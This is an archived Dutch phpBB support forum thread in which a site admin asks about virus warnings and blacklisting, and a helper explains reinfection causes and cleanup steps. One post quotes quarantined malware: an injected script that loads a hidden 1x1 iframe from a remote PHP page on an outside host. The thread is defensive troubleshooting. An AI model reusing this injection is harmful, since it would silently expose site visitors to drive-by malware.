viruswaarschuwingen

Hulp nodig bij je installatie of kom je ergens niet uit? Probeer phpBB3! Problemen lossen we samen met je op.
phpBB 3.0 is End of support per 1 januari 2017. Dit forum is hier enkel ter archief. Het wordt aangeraden te upgraden naar phpBB 3.2
Forumregels
phpBB 3.0 is End of support per 1 januari 2017. Dit forum is hier enkel ter archief. Het wordt aangeraden te upgraden naar phpBB 3.2
Gesloten
heeftmeer
Berichten: 6
Lid geworden op: 08 sep 2011, 14:25

viruswaarschuwingen

Bericht door heeftmeer » 17 dec 2012, 21:15

  • Adres van je forum: http://www.urbexnederland.nl
    Event. modificaties op je forum: nee
    Wanneer ontstond het probleem? vandaag
    phpBB versie: 3.11.0


    Heb je onlangs iets veranderd aan je forum? vorige week het forum opgeschoond
    Wat is het probleem?
Krijgen viruswaarschuwingen en de site is blacklisted.
Vorige week zijn er een aantal besmettingen geconstateerd door programmeur en zijn verwijderd. Alles teruggezet naar de basisintellingen van oktober dit jaar en alles was weer ok.
Vandaag weer waarschuwingen en een scan gedaan met resultaat dat de website is blacklisted.
Ook links doorgekregen waar we in gekeken hebben maar niks te vinden in de links.
Heeft iemand een idee hoe dit kan? Komt dit nog steeds door de besmetting van vorige week?
Alvast bedankt.. Andre
Omhoog
Gebruikersavatar
Pola
Berichten: 1495
Lid geworden op: 19 jan 2012, 14:40
Contacteer:
Contacteer Pola

Re: viruswaarschuwingen

Bericht door Pola » 17 dec 2012, 22:43

Er zijn meerdere mogelijkheden. Het kan zijn dat er een bestand op je server staat die de malware code opnieuw aan (meestal index.php of index.html) bestanden toevoegt.
Het kan ook zijn dat iemand toegang heeft gekregen tot de bestanden op je server. Dit kan ook weer op meerdere manieren. Het kan zijn dat iemand jouw FTP gegevens in handen gekregen heeft. Dit zou kunnen doordat iemand mee heeft gekeken op jouw verbinding op een moment dat je via FTP inlogde op je server. Het kan ook zijn dat wanneer je op een shared server zit die niet goed beveiligd is door de host er via een achterdeur toegang gevonden is tot de bestanden op de server.

Wat je in ieder geval moet doen als je deze vorm van malware tegenkomt:
  • Je host waarschuwen
  • Alle besmette bestanden opschonen/vervangen door originele bestanden en alle onbekende bestanden verwijderen (eventueel samen met je host, of helemaal door je host)
  • Al je wachtwoorden veranderen (control panel, FTP).
HGN op phpbb.com
Omhoog
heeftmeer
Berichten: 6
Lid geworden op: 08 sep 2011, 14:25

Re: viruswaarschuwingen

Bericht door heeftmeer » 17 dec 2012, 23:33

Alle wachtwoorden zijn gewijzigd en zijn alleen bekend bij david alhier bekend en bij mij..
Dat bestand wat geupload is zie ik dan ook meer in. Ga verder zoeken tussen de bestanden.
Deze code zat nog in quarantaine.. zegt jullie dit iets? Na de head

<html>
<head><!--f524d6--><script type="text/javascript" language="javascript" > (function () { var cczst = document.createElement('iframe'); cczst.src = 'http://espace-en-soi.org/ayurveda/rel.php'; cczst.style.position = 'absolute'; cczst.style.border = '0'; cczst.style.height = '1px'; cczst.style.width = '1px'; cczst.style.left = '1px'; cczst.style.top = '1px'; if (!document.getElementById('cczst')) { document.write('<div id=\'cczst\'></div>'); document.getElementById('cczst').appendChild(cczst); }})();</script><!--/f524d6-->

<title></title>
<meta http-equiv="Content-Type" content="text/html; ch
Omhoog
heeftmeer
Berichten: 6
Lid geworden op: 08 sep 2011, 14:25

Re: viruswaarschuwingen

Bericht door heeftmeer » 18 dec 2012, 15:38

code gevonden en opgelost.. thanks
Omhoog
Gesloten

Terug naar “3.0 Support”